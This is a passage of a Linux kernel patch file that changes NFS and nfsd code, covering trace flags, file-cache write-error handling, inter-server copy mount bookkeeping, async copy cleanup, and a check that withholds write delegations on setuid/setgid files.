++	struct nfs_client *clp = NFS_SERVER(inode)->nfs_client;
++
++	nfs4_schedule_state_manager(clp);
+ }
+ 
+ static const struct inode_operations nfs4_dir_inode_operations = {
+diff --git a/fs/nfs/nfs4trace.h b/fs/nfs/nfs4trace.h
+index 2cff5901c6894..3fa77ad7258f2 100644
+--- a/fs/nfs/nfs4trace.h
++++ b/fs/nfs/nfs4trace.h
+@@ -292,32 +292,34 @@ TRACE_DEFINE_ENUM(NFS4CLNT_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_LEASE_MOVED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_DELEGATION_EXPIRED);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RUN_MANAGER);
++TRACE_DEFINE_ENUM(NFS4CLNT_MANAGER_AVAILABLE);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_RUNNING);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_READ);
+ TRACE_DEFINE_ENUM(NFS4CLNT_RECALL_ANY_LAYOUT_RW);
++TRACE_DEFINE_ENUM(NFS4CLNT_DELEGRETURN_DELAYED);
+ 
+ #define show_nfs4_clp_state(state) \
+ 	__print_flags(state, "|", \
+-		{ NFS4CLNT_MANAGER_RUNNING,	"MANAGER_RUNNING" }, \
+-		{ NFS4CLNT_CHECK_LEASE,		"CHECK_LEASE" }, \
+-		{ NFS4CLNT_LEASE_EXPIRED,	"LEASE_EXPIRED" }, \
+-		{ NFS4CLNT_RECLAIM_REBOOT,	"RECLAIM_REBOOT" }, \
+-		{ NFS4CLNT_RECLAIM_NOGRACE,	"RECLAIM_NOGRACE" }, \
+-		{ NFS4CLNT_DELEGRETURN,		"DELEGRETURN" }, \
+-		{ NFS4CLNT_SESSION_RESET,	"SESSION_RESET" }, \
+-		{ NFS4CLNT_LEASE_CONFIRM,	"LEASE_CONFIRM" }, \
+-		{ NFS4CLNT_SERVER_SCOPE_MISMATCH, \
+-						"SERVER_SCOPE_MISMATCH" }, \
+-		{ NFS4CLNT_PURGE_STATE,		"PURGE_STATE" }, \
+-		{ NFS4CLNT_BIND_CONN_TO_SESSION, \
+-						"BIND_CONN_TO_SESSION" }, \
+-		{ NFS4CLNT_MOVED,		"MOVED" }, \
+-		{ NFS4CLNT_LEASE_MOVED,		"LEASE_MOVED" }, \
+-		{ NFS4CLNT_DELEGATION_EXPIRED,	"DELEGATION_EXPIRED" }, \
+-		{ NFS4CLNT_RUN_MANAGER,		"RUN_MANAGER" }, \
+-		{ NFS4CLNT_RECALL_RUNNING,	"RECALL_RUNNING" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_READ, "RECALL_ANY_LAYOUT_READ" }, \
+-		{ NFS4CLNT_RECALL_ANY_LAYOUT_RW, "RECALL_ANY_LAYOUT_RW" })
++	{ BIT(NFS4CLNT_MANAGER_RUNNING),	"MANAGER_RUNNING" }, \
++	{ BIT(NFS4CLNT_CHECK_LEASE),		"CHECK_LEASE" }, \
++	{ BIT(NFS4CLNT_LEASE_EXPIRED),	"LEASE_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RECLAIM_REBOOT),	"RECLAIM_REBOOT" }, \
++	{ BIT(NFS4CLNT_RECLAIM_NOGRACE),	"RECLAIM_NOGRACE" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN),		"DELEGRETURN" }, \
++	{ BIT(NFS4CLNT_SESSION_RESET),	"SESSION_RESET" }, \
++	{ BIT(NFS4CLNT_LEASE_CONFIRM),	"LEASE_CONFIRM" }, \
++	{ BIT(NFS4CLNT_SERVER_SCOPE_MISMATCH),	"SERVER_SCOPE_MISMATCH" }, \
++	{ BIT(NFS4CLNT_PURGE_STATE),		"PURGE_STATE" }, \
++	{ BIT(NFS4CLNT_BIND_CONN_TO_SESSION),	"BIND_CONN_TO_SESSION" }, \
++	{ BIT(NFS4CLNT_MOVED),		"MOVED" }, \
++	{ BIT(NFS4CLNT_LEASE_MOVED),		"LEASE_MOVED" }, \
++	{ BIT(NFS4CLNT_DELEGATION_EXPIRED),	"DELEGATION_EXPIRED" }, \
++	{ BIT(NFS4CLNT_RUN_MANAGER),		"RUN_MANAGER" }, \
++	{ BIT(NFS4CLNT_MANAGER_AVAILABLE), "MANAGER_AVAILABLE" }, \
++	{ BIT(NFS4CLNT_RECALL_RUNNING),	"RECALL_RUNNING" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_READ), "RECALL_ANY_LAYOUT_READ" }, \
++	{ BIT(NFS4CLNT_RECALL_ANY_LAYOUT_RW), "RECALL_ANY_LAYOUT_RW" }, \
++	{ BIT(NFS4CLNT_DELEGRETURN_DELAYED), "DELERETURN_DELAYED" })
+ 
+ TRACE_EVENT(nfs4_state_mgr,
+ 		TP_PROTO(
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index 142b3c928f76e..5cb8cce153a57 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -309,37 +309,27 @@ nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
+ 	return nf;
+ }
+ 
++/**
++ * nfsd_file_check_write_error - check for writeback errors on a file
++ * @nf: nfsd_file to check for writeback errors
++ *
++ * Check whether a nfsd_file has an unseen error. Reset the write
++ * verifier if so.
++ */
+ static void
+-nfsd_file_fsync(struct nfsd_file *nf)
+-{
+-	struct file *file = nf->nf_file;
+-	int ret;
+-
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return;
+-	ret = vfs_fsync(file, 1);
+-	trace_nfsd_file_fsync(nf, ret);
+-	if (ret)
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+-}
+-
+-static int
+ nfsd_file_check_write_error(struct nfsd_file *nf)
+ {
+ 	struct file *file = nf->nf_file;
+ 
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return 0;
+-	return filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err));
++	if ((file->f_mode & FMODE_WRITE) &&
++	    filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err)))
++		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ }
+ 
+ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+ 	trace_nfsd_file_unhash(nf);
+-
+-	if (nfsd_file_check_write_error(nf))
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ 	rhashtable_remove_fast(&nfsd_file_rhash_tbl, &nf->nf_rhash,
+ 			       nfsd_file_rhash_params);
+ }
+@@ -365,23 +355,12 @@ nfsd_file_free(struct nfsd_file *nf)
+ 	this_cpu_add(nfsd_file_total_age, age);
+ 
+ 	nfsd_file_unhash(nf);
+-
+-	/*
+-	 * We call fsync here in order to catch writeback errors. It's not
+-	 * strictly required by the protocol, but an nfsd_file could get
+-	 * evicted from the cache before a COMMIT comes in. If another
+-	 * task were to open that file in the interim and scrape the error,
+-	 * then the client may never see it. By calling fsync here, we ensure
+-	 * that writeback happens before the entry is freed, and that any
+-	 * errors reported result in the write verifier changing.
+-	 */
+-	nfsd_file_fsync(nf);
+-
+ 	if (nf->nf_mark)
+ 		nfsd_file_mark_put(nf->nf_mark);
+ 	if (nf->nf_file) {
+ 		get_file(nf->nf_file);
+ 		filp_close(nf->nf_file, NULL);
++		nfsd_file_check_write_error(nf);
+ 		fput(nf->nf_file);
+ 	}
+ 
+@@ -1136,6 +1115,7 @@ wait_for_construction:
+ out:
+ 	if (status == nfs_ok) {
+ 		this_cpu_inc(nfsd_file_acquisitions);
++		nfsd_file_check_write_error(nf);
+ 		*pnf = nf;
+ 	} else {
+ 		if (refcount_dec_and_test(&nf->nf_ref))
+diff --git a/fs/nfsd/nfs4layouts.c b/fs/nfsd/nfs4layouts.c
+index 3564d1c6f6104..e8a80052cb1ba 100644
+--- a/fs/nfsd/nfs4layouts.c
++++ b/fs/nfsd/nfs4layouts.c
+@@ -323,11 +323,11 @@ nfsd4_recall_file_layout(struct nfs4_layout_stateid *ls)
+ 	if (ls->ls_recalled)
+ 		goto out_unlock;
+ 
+-	ls->ls_recalled = true;
+-	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	if (list_empty(&ls->ls_layouts))
+ 		goto out_unlock;
+ 
++	ls->ls_recalled = true;
++	atomic_inc(&ls->ls_stid.sc_file->fi_lo_recalls);
+ 	trace_nfsd_layout_recall(&ls->ls_stid.sc_stateid);
+ 
+ 	refcount_inc(&ls->ls_stid.sc_count);
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index ba04ce9b9fa51..a90e792a94d77 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1227,8 +1227,10 @@ out:
+ 	return status;
+ out_put_dst:
+ 	nfsd_file_put(*dst);
++	*dst = NULL;
+ out_put_src:
+ 	nfsd_file_put(*src);
++	*src = NULL;
+ 	goto out;
+ }
+ 
+@@ -1306,15 +1308,15 @@ extern void nfs_sb_deactive(struct super_block *sb);
+  * setup a work entry in the ssc delayed unmount list.
+  */
+ static __be32 nfsd4_ssc_setup_dul(struct nfsd_net *nn, char *ipaddr,
+-		struct nfsd4_ssc_umount_item **retwork, struct vfsmount **ss_mnt)
++				  struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd4_ssc_umount_item *tmp;
+ 	DEFINE_WAIT(wait);
++	__be32 status = 0;
+ 
+-	*ss_mnt = NULL;
+-	*retwork = NULL;
++	*nsui = NULL;
+ 	work = kzalloc(sizeof(*work), GFP_KERNEL);
+ try_again:
+ 	spin_lock(&nn->nfsd_ssc_lock);
+@@ -1338,12 +1340,12 @@ try_again:
+ 			finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 			goto try_again;
+ 		}
+-		*ss_mnt = ni->nsui_vfsmount;
++		*nsui = ni;
+ 		refcount_inc(&ni->nsui_refcnt);
+ 		spin_unlock(&nn->nfsd_ssc_lock);
+ 		kfree(work);
+ 
+-		/* return vfsmount in ss_mnt */
++		/* return vfsmount in (*nsui)->nsui_vfsmount */
+ 		return 0;
+ 	}
+ 	if (work) {
+@@ -1351,31 +1353,32 @@ try_again:
+ 		refcount_set(&work->nsui_refcnt, 2);
+ 		work->nsui_busy = true;
+ 		list_add_tail(&work->nsui_list, &nn->nfsd_ssc_mount_list);
+-		*retwork = work;
+-	}
++		*nsui = work;
++	} else
++		status = nfserr_resource;
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	return 0;
++	return status;
+ }
+ 
+-static void nfsd4_ssc_update_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work, struct vfsmount *ss_mnt)
++static void nfsd4_ssc_update_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui,
++				 struct vfsmount *ss_mnt)
+ {
+-	/* set nsui_vfsmount, clear busy flag and wakeup waiters */
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	work->nsui_vfsmount = ss_mnt;
+-	work->nsui_busy = false;
++	nsui->nsui_vfsmount = ss_mnt;
++	nsui->nsui_busy = false;
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+ }
+ 
+-static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+-		struct nfsd4_ssc_umount_item *work)
++static void nfsd4_ssc_cancel_dul(struct nfsd_net *nn,
++				 struct nfsd4_ssc_umount_item *nsui)
+ {
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	list_del(&work->nsui_list);
++	list_del(&nsui->nsui_list);
+ 	wake_up_all(&nn->nfsd_ssc_waitq);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	kfree(work);
++	kfree(nsui);
+ }
+ 
+ /*
+@@ -1383,7 +1386,7 @@ static void nfsd4_ssc_cancel_dul_work(struct nfsd_net *nn,
+  */
+ static __be32
+ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+-		       struct vfsmount **mount)
++		       struct nfsd4_ssc_umount_item **nsui)
+ {
+ 	struct file_system_type *type;
+ 	struct vfsmount *ss_mnt;
+@@ -1394,7 +1397,6 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	char *ipaddr, *dev_name, *raw_data;
+ 	int len, raw_len;
+ 	__be32 status = nfserr_inval;
+-	struct nfsd4_ssc_umount_item *work = NULL;
+ 	struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 
+ 	naddr = &nss->u.nl4_addr;
+@@ -1402,6 +1404,7 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 					 naddr->addr_len,
+ 					 (struct sockaddr *)&tmp_addr,
+ 					 sizeof(tmp_addr));
++	*nsui = NULL;
+ 	if (tmp_addrlen == 0)
+ 		goto out_err;
+ 
+@@ -1444,10 +1447,10 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 		goto out_free_rawdata;
+ 	snprintf(dev_name, len + 5, "%s%s%s:/", startsep, ipaddr, endsep);
+ 
+-	status = nfsd4_ssc_setup_dul(nn, ipaddr, &work, &ss_mnt);
++	status = nfsd4_ssc_setup_dul(nn, ipaddr, nsui);
+ 	if (status)
+ 		goto out_free_devname;
+-	if (ss_mnt)
++	if ((*nsui)->nsui_vfsmount)
+ 		goto out_done;
+ 
+ 	/* Use an 'internal' mount: SB_KERNMOUNT -> MNT_INTERNAL */
+@@ -1455,15 +1458,12 @@ nfsd4_interssc_connect(struct nl4_server *nss, struct svc_rqst *rqstp,
+ 	module_put(type->owner);
+ 	if (IS_ERR(ss_mnt)) {
+ 		status = nfserr_nodev;
+-		if (work)
+-			nfsd4_ssc_cancel_dul_work(nn, work);
++		nfsd4_ssc_cancel_dul(nn, *nsui);
+ 		goto out_free_devname;
+ 	}
+-	if (work)
+-		nfsd4_ssc_update_dul_work(nn, work, ss_mnt);
++	nfsd4_ssc_update_dul(nn, *nsui, ss_mnt);
+ out_done:
+ 	status = 0;
+-	*mount = ss_mnt;
+ 
+ out_free_devname:
+ 	kfree(dev_name);
+@@ -1487,7 +1487,7 @@ out_err:
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy, struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+ 	struct svc_fh *s_fh = NULL;
+ 	stateid_t *s_stid = &copy->cp_src_stateid;
+@@ -1500,7 +1500,7 @@ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 	if (status)
+ 		goto out;
+ 
+-	status = nfsd4_interssc_connect(copy->cp_src, rqstp, mount);
++	status = nfsd4_interssc_connect(copy->cp_src, rqstp, &copy->ss_nsui);
+ 	if (status)
+ 		goto out;
+ 
+@@ -1518,45 +1518,26 @@ out:
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+-	bool found = false;
+-	long timeout;
+-	struct nfsd4_ssc_umount_item *tmp;
+-	struct nfsd4_ssc_umount_item *ni = NULL;
+ 	struct nfsd_net *nn = net_generic(dst->nf_net, nfsd_net_id);
++	long timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+ 
+ 	nfs42_ssc_close(filp);
+-	nfsd_file_put(dst);
+ 	fput(filp);
+ 
+-	if (!nn) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ 	spin_lock(&nn->nfsd_ssc_lock);
+-	timeout = msecs_to_jiffies(nfsd4_ssc_umount_timeout);
+-	list_for_each_entry_safe(ni, tmp, &nn->nfsd_ssc_mount_list, nsui_list) {
+-		if (ni->nsui_vfsmount->mnt_sb == ss_mnt->mnt_sb) {
+-			list_del(&ni->nsui_list);
+-			/*
+-			 * vfsmount can be shared by multiple exports,
+-			 * decrement refcnt. If the count drops to 1 it
+-			 * will be unmounted when nsui_expire expires.
+-			 */
+-			refcount_dec(&ni->nsui_refcnt);
+-			ni->nsui_expire = jiffies + timeout;
+-			list_add_tail(&ni->nsui_list, &nn->nfsd_ssc_mount_list);
+-			found = true;
+-			break;
+-		}
+-	}
++	list_del(&nsui->nsui_list);
++	/*
++	 * vfsmount can be shared by multiple exports,
++	 * decrement refcnt. If the count drops to 1 it
++	 * will be unmounted when nsui_expire expires.
++	 */
++	refcount_dec(&nsui->nsui_refcnt);
++	nsui->nsui_expire = jiffies + timeout;
++	list_add_tail(&nsui->nsui_list, &nn->nfsd_ssc_mount_list);
+ 	spin_unlock(&nn->nfsd_ssc_lock);
+-	if (!found) {
+-		mntput(ss_mnt);
+-		return;
+-	}
+ }
+ 
+ #else /* CONFIG_NFSD_V4_2_INTER_SSC */
+@@ -1564,15 +1545,13 @@ nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
+ static __be32
+ nfsd4_setup_inter_ssc(struct svc_rqst *rqstp,
+ 		      struct nfsd4_compound_state *cstate,
+-		      struct nfsd4_copy *copy,
+-		      struct vfsmount **mount)
++		      struct nfsd4_copy *copy)
+ {
+-	*mount = NULL;
+ 	return nfserr_inval;
+ }
+ 
+ static void
+-nfsd4_cleanup_inter_ssc(struct vfsmount *ss_mnt, struct file *filp,
++nfsd4_cleanup_inter_ssc(struct nfsd4_ssc_umount_item *nsui, struct file *filp,
+ 			struct nfsd_file *dst)
+ {
+ }
+@@ -1595,13 +1574,6 @@ nfsd4_setup_intra_ssc(struct svc_rqst *rqstp,
+ 				 &copy->nf_dst);
+ }
+ 
+-static void
+-nfsd4_cleanup_intra_ssc(struct nfsd_file *src, struct nfsd_file *dst)
+-{
+-	nfsd_file_put(src);
+-	nfsd_file_put(dst);
+-}
+-
+ static void nfsd4_cb_offload_release(struct nfsd4_callback *cb)
+ {
+ 	struct nfsd4_cb_offload *cbo =
+@@ -1713,18 +1685,27 @@ static void dup_copy_fields(struct nfsd4_copy *src, struct nfsd4_copy *dst)
+ 	memcpy(dst->cp_src, src->cp_src, sizeof(struct nl4_server));
+ 	memcpy(&dst->stateid, &src->stateid, sizeof(src->stateid));
+ 	memcpy(&dst->c_fh, &src->c_fh, sizeof(src->c_fh));
+-	dst->ss_mnt = src->ss_mnt;
++	dst->ss_nsui = src->ss_nsui;
++}
++
++static void release_copy_files(struct nfsd4_copy *copy)
++{
++	if (copy->nf_src)
++		nfsd_file_put(copy->nf_src);
++	if (copy->nf_dst)
++		nfsd_file_put(copy->nf_dst);
+ }
+ 
+ static void cleanup_async_copy(struct nfsd4_copy *copy)
+ {
+ 	nfs4_free_copy_state(copy);
+-	nfsd_file_put(copy->nf_dst);
+-	if (!nfsd4_ssc_is_inter(copy))
+-		nfsd_file_put(copy->nf_src);
+-	spin_lock(&copy->cp_clp->async_lock);
+-	list_del(&copy->copies);
+-	spin_unlock(&copy->cp_clp->async_lock);
++	release_copy_files(copy);
++	if (copy->cp_clp) {
++		spin_lock(&copy->cp_clp->async_lock);
++		if (!list_empty(&copy->copies))
++			list_del_init(&copy->copies);
++		spin_unlock(&copy->cp_clp->async_lock);
++	}
+ 	nfs4_put_copy(copy);
+ }
+ 
+@@ -1762,8 +1743,8 @@ static int nfsd4_do_async_copy(void *data)
+ 	if (nfsd4_ssc_is_inter(copy)) {
+ 		struct file *filp;
+ 
+-		filp = nfs42_ssc_open(copy->ss_mnt, &copy->c_fh,
+-				      &copy->stateid);
++		filp = nfs42_ssc_open(copy->ss_nsui->nsui_vfsmount,
++				      &copy->c_fh, &copy->stateid);
+ 		if (IS_ERR(filp)) {
+ 			switch (PTR_ERR(filp)) {
+ 			case -EBADF:
+@@ -1777,11 +1758,10 @@ static int nfsd4_do_async_copy(void *data)
+ 		}
+ 		nfserr = nfsd4_do_copy(copy, filp, copy->nf_dst->nf_file,
+ 				       false);
+-		nfsd4_cleanup_inter_ssc(copy->ss_mnt, filp, copy->nf_dst);
++		nfsd4_cleanup_inter_ssc(copy->ss_nsui, filp, copy->nf_dst);
+ 	} else {
+ 		nfserr = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, false);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ 
+ do_callback:
+@@ -1803,8 +1783,7 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 			status = nfserr_notsupp;
+ 			goto out;
+ 		}
+-		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy,
+-				&copy->ss_mnt);
++		status = nfsd4_setup_inter_ssc(rqstp, cstate, copy);
+ 		if (status)
+ 			return nfserr_offload_denied;
+ 	} else {
+@@ -1823,12 +1802,13 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 		async_copy = kzalloc(sizeof(struct nfsd4_copy), GFP_KERNEL);
+ 		if (!async_copy)
+ 			goto out_err;
++		INIT_LIST_HEAD(&async_copy->copies);
++		refcount_set(&async_copy->refcount, 1);
+ 		async_copy->cp_src = kmalloc(sizeof(*async_copy->cp_src), GFP_KERNEL);
+ 		if (!async_copy->cp_src)
+ 			goto out_err;
+ 		if (!nfs4_init_copy_state(nn, copy))
+ 			goto out_err;
+-		refcount_set(&async_copy->refcount, 1);
+ 		memcpy(&copy->cp_res.cb_stateid, &copy->cp_stateid.cs_stid,
+ 			sizeof(copy->cp_res.cb_stateid));
+ 		dup_copy_fields(copy, async_copy);
+@@ -1845,18 +1825,22 @@ nfsd4_copy(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	} else {
+ 		status = nfsd4_do_copy(copy, copy->nf_src->nf_file,
+ 				       copy->nf_dst->nf_file, true);
+-		nfsd4_cleanup_intra_ssc(copy->nf_src, copy->nf_dst);
+ 	}
+ out:
++	release_copy_files(copy);
+ 	return status;
+ out_err:
++	if (nfsd4_ssc_is_inter(copy)) {
++		/*
++		 * Source's vfsmount of inter-copy will be unmounted
++		 * by the laundromat. Use copy instead of async_copy
++		 * since async_copy->ss_nsui might not be set yet.
++		 */
++		refcount_dec(&copy->ss_nsui->nsui_refcnt);
++	}
+ 	if (async_copy)
+ 		cleanup_async_copy(async_copy);
+ 	status = nfserrno(-ENOMEM);
+-	/*
+-	 * source's vfsmount of inter-copy will be unmounted
+-	 * by the laundromat
+-	 */
+ 	goto out;
+ }
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 2247d107da90b..34561764e5c97 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -991,7 +991,6 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 
+ 	stid->cs_stid.si_opaque.so_clid.cl_boot = (u32)nn->boot_time;
+ 	stid->cs_stid.si_opaque.so_clid.cl_id = nn->s2s_cp_cl_id;
+-	stid->cs_type = cs_type;
+ 
+ 	idr_preload(GFP_KERNEL);
+ 	spin_lock(&nn->s2s_cp_lock);
+@@ -1002,6 +1001,7 @@ static int nfs4_init_cp_state(struct nfsd_net *nn, copy_stateid_t *stid,
+ 	idr_preload_end();
+ 	if (new_id < 0)
+ 		return 0;
++	stid->cs_type = cs_type;
+ 	return 1;
+ }
+ 
+@@ -1035,7 +1035,8 @@ void nfs4_free_copy_state(struct nfsd4_copy *copy)
+ {
+ 	struct nfsd_net *nn;
+ 
+-	WARN_ON_ONCE(copy->cp_stateid.cs_type != NFS4_COPY_STID);
++	if (copy->cp_stateid.cs_type != NFS4_COPY_STID)
++		return;
+ 	nn = net_generic(copy->cp_clp->net, nfsd_net_id);
+ 	spin_lock(&nn->s2s_cp_lock);
+ 	idr_remove(&nn->s2s_cp_stateids,
+@@ -5257,16 +5258,17 @@ nfs4_upgrade_open(struct svc_rqst *rqstp, struct nfs4_file *fp,
+ 	/* test and set deny mode */
+ 	spin_lock(&fp->fi_lock);
+ 	status = nfs4_file_check_deny(fp, open->op_share_deny);
+-	if (status == nfs_ok) {
+-		if (status != nfserr_share_denied) {
+-			set_deny(open->op_share_deny, stp);
+-			fp->fi_share_deny |=
+-				(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
+-		} else {
+-			if (nfs4_resolve_deny_conflicts_locked(fp, false,
+-					stp, open->op_share_deny, false))
+-				status = nfserr_jukebox;
+-		}
++	switch (status) {
++	case nfs_ok:
++		set_deny(open->op_share_deny, stp);
++		fp->fi_share_deny |=
++			(open->op_share_deny & NFS4_SHARE_DENY_BOTH);
++		break;
++	case nfserr_share_denied:
++		if (nfs4_resolve_deny_conflicts_locked(fp, false,
++				stp, open->op_share_deny, false))
++			status = nfserr_jukebox;
++		break;
+ 	}
+ 	spin_unlock(&fp->fi_lock);
+ 
+@@ -5397,6 +5399,23 @@ nfsd4_verify_deleg_dentry(struct nfsd4_open *open, struct nfs4_file *fp,
+ 	return 0;
+ }
+ 
++/*
++ * We avoid breaking delegations held by a client due to its own activity, but
++ * clearing setuid/setgid bits on a write is an implicit activity and the client
++ * may not notice and continue using the old mode. Avoid giving out a delegation
++ * on setuid/setgid files when the client is requesting an open for write.
++ */
++static int
++nfsd4_verify_setuid_write(struct nfsd4_open *open, struct nfsd_file *nf)
++{
++	struct inode *inode = file_inode(nf->nf_file);
++
++	if ((open->op_share_access & NFS4_SHARE_ACCESS_WRITE) &&
++	    (inode->i_mode & (S_ISUID|S_ISGID)))
++		return -EAGAIN;
++	return 0;
++}
++
+ static struct nfs4_delegation *
+ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 		    struct svc_fh *parent)
+@@ -5430,6 +5449,8 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	spin_lock(&fp->fi_lock);
+ 	if (nfs4_delegation_exists(clp, fp))
+ 		status = -EAGAIN;
++	else if (nfsd4_verify_setuid_write(open, nf))
++		status = -EAGAIN;
+ 	else if (!fp->fi_deleg_file) {
+ 		fp->fi_deleg_file = nf;
+ 		/* increment early to prevent fi_deleg_file from being
+@@ -5470,6 +5491,14 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	if (status)
+ 		goto out_unlock;
+ 
++	/*
++	 * Now that the deleg is set, check again to ensure that nothing
++	 * raced in and changed the mode while we weren't lookng.
++	 */
++	status = nfsd4_verify_setuid_write(open, fp->fi_deleg_file);
++	if (status)
++		goto out_unlock;
++
+ 	spin_lock(&state_lock);
+ 	spin_lock(&fp->fi_lock);
+ 	if (fp->fi_had_conflict)
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 8b1afde192118..6b20f285f3ca6 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -357,7 +357,7 @@ void nfsd_copy_write_verifier(__be32 verf[2], struct nfsd_net *nn)
+ 
+ 	do {
+ 		read_seqbegin_or_lock(&nn->writeverf_lock, &seq);
+-		memcpy(verf, nn->writeverf, sizeof(*verf));
++		memcpy(verf, nn->writeverf, sizeof(nn->writeverf));
+ 	} while (need_seqretry(&nn->writeverf_lock, seq));
+ 	done_seqretry(&nn->writeverf_lock, seq);
+ }
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 4eb4e1039c7f4..132335011ccae 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -1143,37 +1143,6 @@ TRACE_EVENT(nfsd_file_close,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_fsync,
+-	TP_PROTO(
+-		const struct nfsd_file *nf,
+-		int ret
+-	),
+-	TP_ARGS(nf, ret),
+-	TP_STRUCT__entry(
+-		__field(void *, nf_inode)
+-		__field(int, nf_ref)
+-		__field(int, ret)
+-		__field(unsigned long, nf_flags)
+-		__field(unsigned char, nf_may)
+-		__field(struct file *, nf_file)
+-	),
+-	TP_fast_assign(
+-		__entry->nf_inode = nf->nf_inode;
+-		__entry->nf_ref = refcount_read(&nf->nf_ref);
+-		__entry->ret = ret;
+-		__entry->nf_flags = nf->nf_flags;
+-		__entry->nf_may = nf->nf_may;
+-		__entry->nf_file = nf->nf_file;
+-	),
+-	TP_printk("inode=%p ref=%d flags=%s may=%s nf_file=%p ret=%d",
+-		__entry->nf_inode,
+-		__entry->nf_ref,
+-		show_nf_flags(__entry->nf_flags),
+-		show_nfsd_may_flags(__entry->nf_may),
+-		__entry->nf_file, __entry->ret
+-	)
+-);
+-
+ #include "cache.h"
+ 
+ TRACE_DEFINE_ENUM(RC_DROPIT);
+diff --git a/fs/nfsd/xdr4.h b/fs/nfsd/xdr4.h
+index 0eb00105d845b..36c3340c1d54a 100644
+--- a/fs/nfsd/xdr4.h
++++ b/fs/nfsd/xdr4.h
+@@ -571,7 +571,7 @@ struct nfsd4_copy {
+ 	struct task_struct	*copy_task;
+ 	refcount_t		refcount;
+ 
+-	struct vfsmount		*ss_mnt;
++	struct nfsd4_ssc_umount_item *ss_nsui;
+ 	struct nfs_fh		c_fh;
+ 	nfs4_stateid		stateid;
+ };
+diff --git a/fs/ocfs2/move_extents.c b/fs/ocfs2/move_extents.c
+index 192cad0662d8b..b1e32ec4a9d41 100644
+--- a/fs/ocfs2/move_extents.c
++++ b/fs/ocfs2/move_extents.c
+@@ -105,14 +105,6 @@ static int __ocfs2_move_extent(handle_t *handle,
+ 	 */
